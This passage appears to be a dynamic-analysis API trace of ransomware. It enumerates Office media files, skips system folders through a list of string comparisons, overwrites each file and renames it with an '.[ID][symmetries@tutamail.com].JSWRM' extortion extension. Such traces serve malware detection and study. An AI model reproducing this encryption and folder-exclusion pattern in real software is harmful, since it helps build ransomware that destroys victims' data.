lstrcmpiW (lpString1="LYNC_connecting.wav", lpString2="..") returned 1 [0135.069] lstrcmpiW (lpString1="LYNC_connecting.wav", lpString2="...") returned 1 [0135.069] lstrcmpiW (lpString1="LYNC_connecting.wav", lpString2="windows") returned -1 [0135.069] lstrcmpiW (lpString1="LYNC_connecting.wav", lpString2="recovery") returned -1 [0135.069] lstrcmpiW (lpString1="LYNC_connecting.wav", lpString2="perflogs") returned -1 [0135.069] lstrcmpiW (lpString1="LYNC_connecting.wav", lpString2="documents and settings") returned 1 [0135.069] lstrcmpiW (lpString1="LYNC_connecting.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.069] lstrcmpiW (lpString1="LYNC_connecting.wav", lpString2="system volume information") returned -1 [0135.069] lstrcmpiW (lpString1="LYNC_connecting.wav", lpString2="msocache") returned -1 [0135.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_connecting.wav", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0135.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_connecting.wav", cchWideChar=19, lpMultiByteStr=0x241308, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_connecting.wav", lpUsedDefaultChar=0x0) returned 19 [0135.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_connecting.wav", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0135.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_connecting.wav", cchWideChar=19, lpMultiByteStr=0x2411f0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_connecting.wav", lpUsedDefaultChar=0x0) returned 19 [0135.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_connecting.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_connecting.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.070] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=187244) returned 1 [0135.070] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.070] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.086] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.086] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.086] CloseHandle (hObject=0x238) returned 1 [0135.086] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_connecting.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_connecting.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_connecting.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_connecting.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.087] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b03add6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b03add6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b06103b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8226, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_dialtone.wav", cAlternateFileName="LY3254~1.WAV")) returned 1 [0135.088] lstrcmpiW (lpString1="LYNC_dialtone.wav", lpString2=".") returned 1 [0135.088] lstrcmpiW (lpString1="LYNC_dialtone.wav", lpString2="..") returned 1 [0135.088] lstrcmpiW (lpString1="LYNC_dialtone.wav", lpString2="...") returned 1 [0135.088] lstrcmpiW (lpString1="LYNC_dialtone.wav", lpString2="windows") returned -1 [0135.088] lstrcmpiW (lpString1="LYNC_dialtone.wav", lpString2="recovery") returned -1 [0135.088] lstrcmpiW (lpString1="LYNC_dialtone.wav", lpString2="perflogs") returned -1 [0135.088] lstrcmpiW (lpString1="LYNC_dialtone.wav", lpString2="documents and settings") returned 1 [0135.088] lstrcmpiW (lpString1="LYNC_dialtone.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.088] lstrcmpiW (lpString1="LYNC_dialtone.wav", lpString2="system volume information") returned -1 [0135.088] lstrcmpiW (lpString1="LYNC_dialtone.wav", lpString2="msocache") returned -1 [0135.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dialtone.wav", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0135.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dialtone.wav", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dialtone.wav", lpUsedDefaultChar=0x0) returned 17 [0135.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dialtone.wav", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0135.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dialtone.wav", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dialtone.wav", lpUsedDefaultChar=0x0) returned 17 [0135.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dialtone.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dialtone.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.089] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33318) returned 1 [0135.089] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.089] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x8220, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x8220, lpOverlapped=0x0) returned 1 [0135.093] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.093] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x8220, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x8220, lpOverlapped=0x0) returned 1 [0135.093] CloseHandle (hObject=0x238) returned 1 [0135.093] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dialtone.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dialtone.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dialtone.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dialtone.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.094] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1afa24f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1afa24f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b03add6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2588, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_dtmf0.wav", cAlternateFileName="LYD4E7~1.WAV")) returned 1 [0135.094] lstrcmpiW (lpString1="LYNC_dtmf0.wav", lpString2=".") returned 1 [0135.094] lstrcmpiW (lpString1="LYNC_dtmf0.wav", lpString2="..") returned 1 [0135.094] lstrcmpiW (lpString1="LYNC_dtmf0.wav", lpString2="...") returned 1 [0135.094] lstrcmpiW (lpString1="LYNC_dtmf0.wav", lpString2="windows") returned -1 [0135.094] lstrcmpiW (lpString1="LYNC_dtmf0.wav", lpString2="recovery") returned -1 [0135.094] lstrcmpiW (lpString1="LYNC_dtmf0.wav", lpString2="perflogs") returned -1 [0135.094] lstrcmpiW (lpString1="LYNC_dtmf0.wav", lpString2="documents and settings") returned 1 [0135.094] lstrcmpiW (lpString1="LYNC_dtmf0.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.094] lstrcmpiW (lpString1="LYNC_dtmf0.wav", lpString2="system volume information") returned -1 [0135.094] lstrcmpiW (lpString1="LYNC_dtmf0.wav", lpString2="msocache") returned -1 [0135.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf0.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf0.wav", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf0.wav", lpUsedDefaultChar=0x0) returned 14 [0135.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf0.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf0.wav", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf0.wav", lpUsedDefaultChar=0x0) returned 14 [0135.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf0.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf0.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.102] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9608) returned 1 [0135.102] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.102] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2580, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2580, lpOverlapped=0x0) returned 1 [0135.105] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.105] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2580, lpOverlapped=0x0) returned 1 [0135.105] CloseHandle (hObject=0x238) returned 1 [0135.105] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf0.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf0.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf0.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf0.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.106] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1afa24f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1afa24f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b03add6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2530, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_dtmf1.wav", cAlternateFileName="LY1F07~1.WAV")) returned 1 [0135.106] lstrcmpiW (lpString1="LYNC_dtmf1.wav", lpString2=".") returned 1 [0135.106] lstrcmpiW (lpString1="LYNC_dtmf1.wav", lpString2="..") returned 1 [0135.106] lstrcmpiW (lpString1="LYNC_dtmf1.wav", lpString2="...") returned 1 [0135.106] lstrcmpiW (lpString1="LYNC_dtmf1.wav", lpString2="windows") returned -1 [0135.106] lstrcmpiW (lpString1="LYNC_dtmf1.wav", lpString2="recovery") returned -1 [0135.106] lstrcmpiW (lpString1="LYNC_dtmf1.wav", lpString2="perflogs") returned -1 [0135.106] lstrcmpiW (lpString1="LYNC_dtmf1.wav", lpString2="documents and settings") returned 1 [0135.106] lstrcmpiW (lpString1="LYNC_dtmf1.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.106] lstrcmpiW (lpString1="LYNC_dtmf1.wav", lpString2="system volume information") returned -1 [0135.106] lstrcmpiW (lpString1="LYNC_dtmf1.wav", lpString2="msocache") returned -1 [0135.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf1.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf1.wav", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf1.wav", lpUsedDefaultChar=0x0) returned 14 [0135.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf1.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf1.wav", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf1.wav", lpUsedDefaultChar=0x0) returned 14 [0135.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf1.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf1.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.107] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9520) returned 1 [0135.107] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.107] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2530, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2530, lpOverlapped=0x0) returned 1 [0135.109] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.109] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2530, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2530, lpOverlapped=0x0) returned 1 [0135.109] CloseHandle (hObject=0x238) returned 1 [0135.110] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf1.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf1.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf1.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf1.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.111] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1af7c22b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1af7c22b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1afa24f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x259c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_dtmf2.wav", cAlternateFileName="LYNC_D~1.WAV")) returned 1 [0135.111] lstrcmpiW (lpString1="LYNC_dtmf2.wav", lpString2=".") returned 1 [0135.111] lstrcmpiW (lpString1="LYNC_dtmf2.wav", lpString2="..") returned 1 [0135.111] lstrcmpiW (lpString1="LYNC_dtmf2.wav", lpString2="...") returned 1 [0135.111] lstrcmpiW (lpString1="LYNC_dtmf2.wav", lpString2="windows") returned -1 [0135.111] lstrcmpiW (lpString1="LYNC_dtmf2.wav", lpString2="recovery") returned -1 [0135.111] lstrcmpiW (lpString1="LYNC_dtmf2.wav", lpString2="perflogs") returned -1 [0135.111] lstrcmpiW (lpString1="LYNC_dtmf2.wav", lpString2="documents and settings") returned 1 [0135.111] lstrcmpiW (lpString1="LYNC_dtmf2.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.111] lstrcmpiW (lpString1="LYNC_dtmf2.wav", lpString2="system volume information") returned -1 [0135.111] lstrcmpiW (lpString1="LYNC_dtmf2.wav", lpString2="msocache") returned -1 [0135.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf2.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf2.wav", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf2.wav", lpUsedDefaultChar=0x0) returned 14 [0135.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf2.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf2.wav", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf2.wav", lpUsedDefaultChar=0x0) returned 14 [0135.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.111] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf2.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf2.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.112] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9628) returned 1 [0135.112] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.112] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2590, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2590, lpOverlapped=0x0) returned 1 [0135.114] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.114] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2590, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2590, lpOverlapped=0x0) returned 1 [0135.114] CloseHandle (hObject=0x238) returned 1 [0135.114] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf2.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf2.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_dtmf2.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_dtmf2.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.115] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1afa24f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1afa24f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b03add6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x258a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_dtmf3.wav", cAlternateFileName="LY55E7~1.WAV")) returned 1 [0135.115] lstrcmpiW (lpString1="LYNC_dtmf3.wav", lpString2=".") returned 1 [0135.115] lstrcmpiW (lpString1="LYNC_dtmf3.wav", lpString2="..") returned 1 [0135.115] lstrcmpiW (lpString1="LYNC_dtmf3.wav", lpString2="...") returned 1 [0135.115] lstrcmpiW (lpString1="LYNC_dtmf3.wav", lpString2="windows") returned -1 [0135.115] lstrcmpiW (lpString1="LYNC_dtmf3.wav", lpString2="recovery") returned -1 [0135.115] lstrcmpiW (lpString1="LYNC_dtmf3.wav", lpString2="perflogs") returned -1 [0135.115] lstrcmpiW (lpString1="LYNC_dtmf3.wav", lpString2="documents and settings") returned 1 [0135.115] lstrcmpiW (lpString1="LYNC_dtmf3.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.115] lstrcmpiW (lpString1="LYNC_dtmf3.wav", lpString2="system volume information") returned -1 [0135.115] lstrcmpiW (lpString1="LYNC_dtmf3.wav", lpString2="msocache") returned -1 [0135.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf3.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0135.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_dtmf3.wav", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_dtmf3.wav", lpUsedDefaultChar=0x0) returned 14 [0135.115] WideCharToMultiByte (in: CodePage=0xfde9, 